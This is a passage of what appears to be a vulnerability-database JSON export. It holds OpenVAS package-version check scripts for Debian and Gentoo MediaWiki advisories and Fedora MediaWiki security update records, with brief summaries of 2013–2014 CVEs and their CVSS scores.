Exposures project identifies the following\nissues:\n\nCVE-2013-2031\nCross-site scripting attack via valid UTF-7 encoded sequences\nin a SVG file.\n\nCVE-2013-4567 & CVE-2013-4568\nKevin Israel (Wikipedia user PleaseStand) reported two ways\nto inject Javascript due to an incomplete blacklist in the\nCSS sanitizer function.\n\nCVE-2013-4572\nMediaWiki and the CentralNotice extension were incorrectly setting\ncache headers when a user was autocreated, causing the user's\nsession cookies to be cached, and returned to other users.\n\nCVE-2013-6452\nChris from RationalWiki reported that SVG files could be\nuploaded that include external stylesheets, which could lead to\nXSS when an XSL was used to include JavaScript.\n\nCVE-2013-6453\nMediaWiki's SVG sanitization could be bypassed when the XML was\nconsidered invalid.\n\nCVE-2013-6454\nMediaWiki's CSS sanitization did not filter -o-link attributes,\nwhich could be used to execute JavaScript in Opera 12.\n\nCVE-2013-6472\nMediaWiki displayed some information about deleted pages in\nthe log API, enhanced RecentChanges, and user watchlists.\n\nCVE-2014-1610\nA remote code execution vulnerability existed if file upload\nsupport for DjVu (natively handled) or PDF files (in\ncombination with the PdfHandler extension) was enabled.\nNeither file type is enabled by default in MediaWiki.\n\nCVE-2014-2665\nCross site request forgery in login form: an attacker could login\na victim as the attacker.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.14+dfsg-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:42", "description": "It was discovered that MediaWiki, a website engine for collaborative\nwork, is vulnerable to JSONP injection in Flash (CVE-2014-5241) and\nclickjacking between OutputPage and ParserOutput (CVE-2014-5243\n). The\nvulnerabilities are addressed by upgrading MediaWiki to the new upstream\nversion 1.19.18, which includes additional changes.", "cvss3": {}, "published": "2014-08-23T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3011-1 (mediawiki - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5243", "CVE-2014-5241"], "modified": "2019-03-19T00:00:00", "id": "OPENVAS:1361412562310703011", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703011", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3011.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 3011-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703011\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-5241\", \"CVE-2014-5243\");\n script_name(\"Debian Security Advisory DSA 3011-1 (mediawiki - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-23 00:00:00 +0200 (Sat, 23 Aug 2014)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-3011.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"mediawiki on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), these problems have been fixed in\nversion 1:1.19.18+dfsg-0+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your mediawiki packages.\");\n script_tag(name:\"summary\", value:\"It was discovered that MediaWiki, a website engine for collaborative\nwork, is vulnerable to JSONP injection in Flash (CVE-2014-5241) and\nclickjacking between OutputPage and ParserOutput (CVE-2014-5243\n). The\nvulnerabilities are addressed by upgrading MediaWiki to the new upstream\nversion 1.19.18, which includes additional changes.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.18+dfsg-0+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-26T08:48:42", "description": "It was discovered that MediaWiki, a website engine for collaborative\nwork, is vulnerable to JSONP injection in Flash (CVE-2014-5241) and\nclickjacking between OutputPage and ParserOutput (CVE-2014-5243 \n). The\nvulnerabilities are addressed by upgrading MediaWiki to the new upstream\nversion 1.19.18, which includes additional changes.", "cvss3": {}, "published": "2014-08-23T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3011-1 (mediawiki - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5243", "CVE-2014-5241"], "modified": "2017-07-11T00:00:00", "id": "OPENVAS:703011", "href": "http://plugins.openvas.org/nasl.php?oid=703011", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3011.nasl 6663 2017-07-11 09:58:05Z teissa $\n# Auto-generated from advisory DSA 3011-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"mediawiki on Debian Linux\";\ntag_insight = \"MediaWiki is a wiki engine (a program for creating a collaboratively\nedited website). It is designed to handle heavy websites containing\nlibrary-like document collections, and supports user uploads of\nimages/sounds, multilingual content, TOC autogeneration, ISBN links,\netc.\";\ntag_solution = \"For the stable distribution (wheezy), these problems have been fixed in\nversion 1:1.19.18+dfsg-0+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your mediawiki packages.\";\ntag_summary = \"It was discovered that MediaWiki, a website engine for collaborative\nwork, is vulnerable to JSONP injection in Flash (CVE-2014-5241) and\nclickjacking between OutputPage and ParserOutput (CVE-2014-5243 \n). The\nvulnerabilities are addressed by upgrading MediaWiki to the new upstream\nversion 1.19.18, which includes additional changes.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(703011);\n script_version(\"$Revision: 6663 $\");\n script_cve_id(\"CVE-2014-5241\", \"CVE-2014-5243\");\n script_name(\"Debian Security Advisory DSA 3011-1 (mediawiki - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-08-23 00:00:00 +0200 (Sat, 23 Aug 2014)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3011.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.18+dfsg-0+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.18+dfsg-0+deb7u1\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.18+dfsg-0+deb7u1\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mediawiki\", ver:\"1:1.19.18+dfsg-0+deb7u1\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:44", "description": "Gentoo Linux Local Security Checks GLSA 201502-04", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201502-04", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9476", "CVE-2014-9479", "CVE-2014-2244", "CVE-2014-9477", "CVE-2014-5243", "CVE-2014-5241", "CVE-2014-2242", "CVE-2014-9487", "CVE-2014-5242", "CVE-2014-7199", "CVE-2014-1610", "CVE-2013-6453", "CVE-2014-9277", "CVE-2013-6472", "CVE-2014-9481", "CVE-2014-2243", "CVE-2014-9475", "CVE-2014-9507", "CVE-2013-6452", "CVE-2014-9478", "CVE-2014-2665", "CVE-2014-9276", "CVE-2013-6454", "CVE-2014-2853", "CVE-2013-6451", "CVE-2014-7295", "CVE-2014-9480"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121343", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121343", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201502-04.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121343\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:28 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201502-04\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in MediaWiki. Please review the CVE identifiers and MediaWiki announcement referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201502-04\");\n script_cve_id(\"CVE-2013-6451\", \"CVE-2013-6452\", \"CVE-2013-6453\", \"CVE-2013-6454\", \"CVE-2013-6472\", \"CVE-2014-1610\", \"CVE-2014-2242\", \"CVE-2014-2243\", \"CVE-2014-2244\", \"CVE-2014-2665\", \"CVE-2014-2853\", \"CVE-2014-5241\", \"CVE-2014-5242\", \"CVE-2014-5243\", \"CVE-2014-7199\", \"CVE-2014-7295\", \"CVE-2014-9276\", \"CVE-2014-9277\", \"CVE-2014-9475\", \"CVE-2014-9476\", \"CVE-2014-9477\", \"CVE-2014-9478\", \"CVE-2014-9479\", \"CVE-2014-9480\", \"CVE-2014-9481\", \"CVE-2014-9487\", \"CVE-2014-9507\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201502-04\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"www-apps/mediawiki\", unaffected: make_list(\"ge 1.23.8\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"www-apps/mediawiki\", unaffected: make_list(\"ge 1.22.15\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"www-apps/mediawiki\", unaffected: make_list(\"ge 1.19.23\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"www-apps/mediawiki\", unaffected: make_list(), vulnerable: make_list(\"lt 1.23.8\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-08-27T01:34:20", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.23.2-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853", "CVE-2014-5241", "CVE-2014-5242", "CVE-2014-5243"], "modified": "2014-08-27T01:34:20", "id": "FEDORA:47A4C221C5", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3V7RS574HYEM2WJZ2T53Z4YLCOT35T7J/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.21.9/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-05-06T03:34:45", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.21.9-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853"], "modified": "2014-05-06T03:34:45", "id": "FEDORA:1CBA822DA4", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/Z5GR7RPVFGXRHT3RQ5TYFKDITUNHKEZP/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-05-06T03:41:21", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.21.9-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853"], "modified": "2014-05-06T03:41:21", "id": "FEDORA:6D086230EA", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/C34F25XGA4VA6I5YH2GWTXQGEDDMAJJY/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.21.10/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-06-10T02:52:13", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.21.10-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853"], "modified": "2014-06-10T02:52:13", "id": "FEDORA:16DFF2150A", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/H27GZHE5RHM4SMEEKUWD6CFVSJP3HWE3/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-06-10T03:02:05", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.21.10-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853"], "modified": "2014-06-10T03:02:05", "id": "FEDORA:74E4B21C4B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/EUHHQGBKBY2BQ3D5NK63KQVKIEOIDHP5/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.21.11/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-07-05T14:54:58", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.21.11-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853"], "modified": "2014-07-05T14:54:58", "id": "FEDORA:6616A21A2B", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/YREMXBSEWQDWWYKHOAPWDJILIIQWP6NF/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-07-05T14:56:32", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.21.11-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610", "CVE-2014-2853"], "modified": "2014-07-05T14:56:32", "id": "FEDORA:B910D20FE4", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/3R6NRGOKYP7TRKCXLLE34G72XR6DUWT5/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.21.5/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-02-07T03:06:58", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.21.5-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610"], "modified": "2014-02-07T03:06:58", "id": "FEDORA:0BE1C217DE", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/CKM5ZLTUG7EXXNAA4MSMQGA3BIMO6TQS/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-02-07T03:09:15", "type": "fedora", "title": "[SECURITY] Fedora 20 Update: mediawiki-1.21.5-1.fc20", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6451", "CVE-2013-6452", "CVE-2013-6453", "CVE-2013-6454", "CVE-2013-6472", "CVE-2014-1610"], "modified": "2014-02-07T03:09:15", "id": "FEDORA:1025E2165F", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/GXMKFYBIAHHZE2T2YGCUW5KTCYUJZAS7/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:52", "description": "MediaWiki is the software used for Wikipedia and the other Wikimedia Foundation websites. Compared to other wikis, it has an excellent range of features and support for high-traffic websites using multiple servers This package supports wiki farms. Read the instructions for creating wiki instances under /usr/share/doc/mediawiki-1.23.4/README.RPM. Remember to remove the config dir after completing the configuration. ", "cvss3": {}, "published": "2014-10-06T05:04:38", "type": "fedora", "title": "[SECURITY] Fedora 19 Update: mediawiki-1.23.4-1.fc19", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 